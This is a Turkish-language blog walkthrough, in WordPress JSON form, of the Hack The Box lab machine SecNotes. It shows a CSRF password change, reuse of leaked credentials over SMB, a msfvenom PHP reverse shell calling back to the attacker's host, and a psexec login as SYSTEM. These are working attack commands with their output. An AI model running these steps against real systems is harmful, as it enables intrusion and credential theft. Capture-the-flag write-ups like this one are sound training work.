{"id":1736,"date":"2022-01-11T17:28:12","date_gmt":"2022-01-11T17:28:12","guid":{"rendered":"http:\/\/berenkudaygorun.com\/blog\/?p=1736"},"modified":"2022-01-11T17:28:12","modified_gmt":"2022-01-11T17:28:12","slug":"secnotes","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2022\/01\/11\/secnotes\/","title":{"rendered":"SecNotes"},"content":{"rendered":"\n\n\n\n\n
Makine Ad\u0131<\/th>\nSeviye<\/th>\nOS<\/th>\nLogo<\/th>\n<\/tr>\n<\/thead>\n
SecNotes<\/a> - HTB<\/td>\nMedium<\/td>\nLinux<\/td>\n\"\"<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

Walkthrough<\/h2>\n

CSRF ile ilgili g\u00fczel bir makine oldu\u011funu d\u00fc\u015f\u00fcn\u00fcyorum. Makine IP adresi 10.10.10.97 ve ne yaz\u0131kki nmap taramas\u0131n\u0131n sonu\u00e7lar\u0131n\u0131 not etmeyi unutmu\u015fum. \u0130nternet sayfas\u0131na gitti\u011fimizde bir login ekran\u0131 ile kar\u015f\u0131la\u015f\u0131yoruz. Baz\u0131 bruteforce denemeleri ger\u00e7ekle\u015ftirdim ancak ba\u015far\u0131l\u0131 olamad\u0131m. Bunun \u00fczerine bir hesap olu\u015fturmay\u0131 denedim. \u0130\u00e7eri girdikten sonra admine mesaj g\u00f6nder gibi bir yer vard\u0131 ve burada csrf olabilece\u011fi akl\u0131ma geldi. Senaryo gere\u011fi san\u0131rsam arkada birileri s\u00fcrekli g\u00f6nderilen linklere t\u0131kl\u0131yor. Buda asl\u0131nda CSRF ile ilgili bir makine oldu\u011fundan dolay\u0131 d\u00fc\u015f\u00fcnmemiz gerekekn ibr \u015fey. Bunu test etmek i\u00e7in kendim bir sunucu aya\u011fa kald\u0131rd\u0131m ve kendi ip mi link olarak verdim. Sonu\u00e7 a\u015fa\u011f\u0131daki gibi:<\/p>\n

\u250c\u2500\u2500(root💀kali)-[\/var\/log\/apache2]\n\u2514\u2500# tail -f access.log\n10.10.10.97 - - [02\/Jan\/2022:07:31:12 -0500] "GET \/index.php?acaba=asdasdasdasd HTTP\/1.1" 200 203 "-" "Mozilla\/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell\/5.1.17134.228"\n<\/code><\/pre>\n
Harika! Bu esnadan internet sitesini test etmeye ba\u015flad\u0131m ve CSRF ile neleri manip\u00fcle edebilirim diye sordum. Parola de\u011fi\u015ftirme k\u0131sm\u0131nda normalde POST ile i\u015flem yap\u0131yoruz ancak ayn\u0131 endpoint GET ile de \u00e7al\u0131\u015fmakta. Bu y\u00fczden asl\u0131nda admin'in parolas\u0131n\u0131 de\u011fi\u015ftirebilece\u011fimi farkettim.<\/p>\n
http:\/\/10.10.10.97\/change_pass.php?password=password&confirm_password=password&submit=submit<\/code><\/pre>\n
\u0130\u00e7eri girdikten sonra tyler kullan\u0131c\u0131s\u0131n\u0131n notlar\u0131nda bir credential buldum.<\/p>\n
\\\\secnotes.htb\\new-site\ntyler \/ 92g!mA8BGjOirkL%OG*&<\/code><\/pre>\n
Bu bilgilerle smb \u00fczerinden enumaration i\u015flemi yapt\u0131m.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/10.10.10.97]\n\u2514\u2500# crackmapexec smb 10.10.10.97 -u 'tyler' -p '92g!mA8BGjOirkL%OG*&' --shares\nSMB         10.10.10.97     445    SECNOTES         [*] Windows 10 Enterprise 17134 (name:SECNOTES) (domain:SECNOTES) (signing:False) (SMBv1:True)\nSMB         10.10.10.97     445    SECNOTES         [+] SECNOTES\\tyler:92g!mA8BGjOirkL%OG*& \nSMB         10.10.10.97     445    SECNOTES         [+] Enumerated shares\nSMB         10.10.10.97     445    SECNOTES         Share           Permissions     Remark\nSMB         10.10.10.97     445    SECNOTES         -----           -----------     ------\nSMB         10.10.10.97     445    SECNOTES         ADMIN$                          Remote Admin\nSMB         10.10.10.97     445    SECNOTES         C$                              Default share\nSMB         10.10.10.97     445    SECNOTES         IPC$                            Remote IPC\nSMB         10.10.10.97     445    SECNOTES         new-site        READ,WRITE     <\/code><\/pre>\n
Portlar\u0131n birinde de IIS vard\u0131 ve php \u00e7al\u0131\u015f\u0131yordu. READ-WRITE yetkimin oldu\u011fu bu k\u0131sm\u0131n IIS'in k\u00f6k diziniydi. Bende buraya reverse shell att\u0131m ve tetikledim.<\/p>\n
mount -t cifs -o 'username=tyler,password=92g!mA8BGjOirkL%OG*&' \/\/10.10.10.97\/new-site \/mnt\/10.10.10.97 <\/code><\/pre>\n
\u250c\u2500\u2500(root💀kali)-[\/mnt\/10.10.10.97]\n\u2514\u2500# echo "deneme" > deneme.txt  <\/code><\/pre>\n
\u250c\u2500\u2500(root💀kali)-[\/mnt\/10.10.10.97]                  \n\u2514\u2500# curl http:\/\/10.10.10.97:8808\/deneme.txt                                                                                                                                                                        \ndeneme <\/code><\/pre>\n
\u250c\u2500\u2500(root💀kali)-[\/mnt\/10.10.10.97]\n\u2514\u2500# msfvenom -p php\/reverse_php LHOST=10.10.14.26 LPORT=80 -f raw > shell.php\n[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload\n[-] No arch selected, selecting arch: php from the payload\nNo encoder specified, outputting raw payload\nPayload size: 3021 bytes<\/code><\/pre>\n
\u250c\u2500\u2500(root💀kali)-[~]\u250c\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# nc -lvp 80\nlistening on [any] 80 ...\nconnect to [10.10.14.26] from secnotes.htb [10.10.10.97] 54317\nMicrosoft Windows [Version 10.0.17134.228]\n(c) 2018 Microsoft Corporation. All rights reserved.\n\nC:\\inetpub\\new-site>\n\nC:\\Users\\tyler\\Desktop>type user.txt\ntype user.txt\nf377be8e7e089b76668b921cd78c191c\n<\/code><\/pre>\n
Daha sonras\u0131nda i\u00e7eride otomatik ara\u00e7lar\u0131 \u00e7al\u0131\u015ft\u0131rd\u0131m ve a\u015fa\u011f\u0131daki sonucu buldum.<\/p>\n
\u0379 Analyzing PGP-GPG Files (limit 70)\n    'C:\\Users\\tyler\\AppData\\Local\\Packages\\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\\LocalState\\rootfs\\usr\\share\\popularity-contest\\debian-popcon.gpg' - content:\n\n    'C:\\Users\\tyler\\AppData\\Local\\Packages\\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\\LocalState\\rootfs\\usr\\share\\keyrings\\ubuntu-master-keyring.gpg' - content:\n\n    'C:\\Users\\tyler\\AppData\\Local\\Packages\\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\\LocalState\\rootfs\\usr\\share\\keyrings\\ubuntu-fips-updates-keyring.gpg' - content:\n\n    'C:\\Users\\tyler\\AppData\\Local\\Packages\\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\\LocalState\\rootfs\\usr\\share\\keyrings\\ubuntu-fips-keyring.gpg' - content:\n\n    'C:\\Users\\tyler\\AppData\\Local\\Packages\\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\\LocalState\\rootfs\\usr\\share\\keyrings\\ubuntu-esm-keyring.gpg' - content:\n\n    'C:\\Users\\tyler\\AppData\\Local\\Packages\\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\\LocalState\\rootfs\\usr\\share\\keyrings\\ubuntu-cloudimage-removed-keys.gpg' - content:\n\n    'C:\\Users\\tyler\\AppData\\Local\\Packages\\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\\LocalState\\rootfs\\usr\\share\\keyrings\\ubuntu-cloudimage-keyring.gpg' - content:\n\n    'C:\\Users\\tyler\\AppData\\Local\\Packages\\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\\LocalState\\rootfs\\usr\\share\\keyrings\\ubuntu-archive-removed-keys.gpg' - content:\n\n    'C:\\Users\\tyler\\AppData\\Local\\Packages\\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\\LocalState\\rootfs\\usr\\share\\keyrings\\ubuntu-archive-keyring.gpg' - content:\n\n    'C:\\Users\\tyler\\AppData\\Local\\Packages\\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\\LocalState\\rootfs\\usr\\share\\gnupg\\distsigkey.gpg' - content:\n\n    'C:\\Users\\tyler\\AppData\\Local\\Packages\\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\\LocalState\\rootfs\\etc\\apt\\trusted.gpg.d\\ubuntu-keyring-2012-cdimage.gpg' - content:\n\n    'C:\\Users\\tyler\\AppData\\Local\\Packages\\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\\LocalState\\rootfs\\etc\\apt\\trusted.gpg.d\\ubuntu-keyring-2012-archive.gpg' - content:\n\n    'C:\\Users\\tyler\\AppData\\Local\\Packages\\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\\LocalState\\rootfs\\usr\\share\\doc\\cryptsetup\\README.gnupg' - content:\n\n\u0379 Looking for Linux shells\/distributions - wsl.exe, bash.exe\n    C:\\Windows\\System32\\wsl.exe                                                                                                                                                                                    \n    C:\\Windows\\System32\\bash.exe        \n\n    Found installed WSL distribution(s) - listed below\n    Run linpeas.sh in your WSL distribution(s) home folder(s).                                                                                                                                                     \n\n    Distribution:      "Ubuntu-18.04"                                                                                                                                                                              \n    Root directory:    "C:\\Users\\tyler\\AppData\\Local\\Packages\\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\\LocalState\\rootfs"\n    Run command:       wsl.exe --distribution "Ubuntu-18.04"         \n<\/code><\/pre>\n
Bunun \u00fczerine linux'un oldu\u011fu k\u0131sma gittim.<\/p>\n
\nC:\\Users\\tyler\\AppData\\Local\\Packages\\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\\LocalState\\rootfs\\root>dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is 1E7B-9B76\n\n Directory of C:\\Users\\tyler\\AppData\\Local\\Packages\\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\\LocalState\\rootfs\\root\n\n06\/22\/2018  01:44 PM    <DIR>          .\n06\/22\/2018  01:44 PM    <DIR>          ..\n06\/22\/2018  02:09 AM             3,112 .bashrc\n06\/22\/2018  01:41 PM               398 .bash_history\n06\/21\/2018  05:00 PM               148 .profile\n06\/22\/2018  01:56 AM    <DIR>          filesystem\n               3 File(s)          3,658 bytes\n               3 Dir(s)  13,302,255,616 bytes free\n\nC:\\Users\\tyler\\AppData\\Local\\Packages\\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\\LocalState\\rootfs\\root>type .bash_history\ntype .bash_history\ncd \/mnt\/c\/\nls\ncd Users\/\ncd \/\ncd ~\nls\npwd\nmkdir filesystem\nmount \/\/127.0.0.1\/c$ filesystem\/\nsudo apt install cifs-utils\nmount \/\/127.0.0.1\/c$ filesystem\/\nmount \/\/127.0.0.1\/c$ filesystem\/ -o user=administrator\ncat \/proc\/filesystems\nsudo modprobe cifs\nsmbclient\napt install smbclient\nsmbclient\nsmbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\\\\\127.0.0.1\\\\c$\n> .bash_history \nless .bash_history\nexit\nC:\\Users\\tyler\\AppData\\Local\\Packages\\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\\LocalState\\rootfs\\root>\n<\/code><\/pre>\n
Test ettim.<\/p>\n
\n\u250c\u2500\u2500(root💀kali)-[~\/10.10.10.97]\n\u2514\u2500# crackmapexec smb 10.10.10.97 -u 'Administrator' -p 'u6!4ZwgwOM#^OBf#Nwnh'\nSMB         10.10.10.97     445    SECNOTES         [*] Windows 10 Enterprise 17134 (name:SECNOTES) (domain:SECNOTES) (signing:False) (SMBv1:True)\nSMB         10.10.10.97     445    SECNOTES         [+] SECNOTES\\Administrator:u6!4ZwgwOM#^OBf#Nwnh (Pwn3d!)\n<\/code><\/pre>\n
Ba\u011fland\u0131m.<\/p>\n
\n\u250c\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# python3 \/usr\/share\/doc\/python3-impacket\/examples\/psexec.py SECNOTES\/Administrator@10.10.10.97\nImpacket v0.9.22 - Copyright 2020 SecureAuth Corporation\n\nPassword:\n[*] Requesting shares on 10.10.10.97.....\n[*] Found writable share ADMIN$\n[*] Uploading file KkXYgZko.exe\n[*] Opening SVCManager on 10.10.10.97.....\n[*] Creating service ecHR on 10.10.10.97.....\n[*] Starting service ecHR.....\n[!] Press help for extra shell commands\nMicrosoft Windows [Version 10.0.17134.228]\n(c) 2018 Microsoft Corporation. All rights reserved.\n\nC:\\WINDOWS\\system32>whoami\nnt authority\\system\n\nC:\\WINDOWS\\system32>cd C:\\Users\\Administrator\\Desktop\n\nC:\\Users\\Administrator\\Desktop>type root.txt\n360864a130968188e3fa3056caef370f\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
Makine Ad\u0131 Seviye OS Logo SecNotes – HTB Medium Linux Walkthrough CSRF ile ilgili g\u00fczel bir makine oldu\u011funu d\u00fc\u015f\u00fcn\u00fcyorum. Makine IP adresi 10.10.10.97 ve ne…<\/p>\n
Devam\u0131n\u0131 okuSecNotes<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[264],"class_list":["post-1736","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-csrf","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1736","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1736"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1736\/revisions"}],"predecessor-version":[{"id":1737,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1736\/revisions\/1737"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1736"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1736"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1736"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}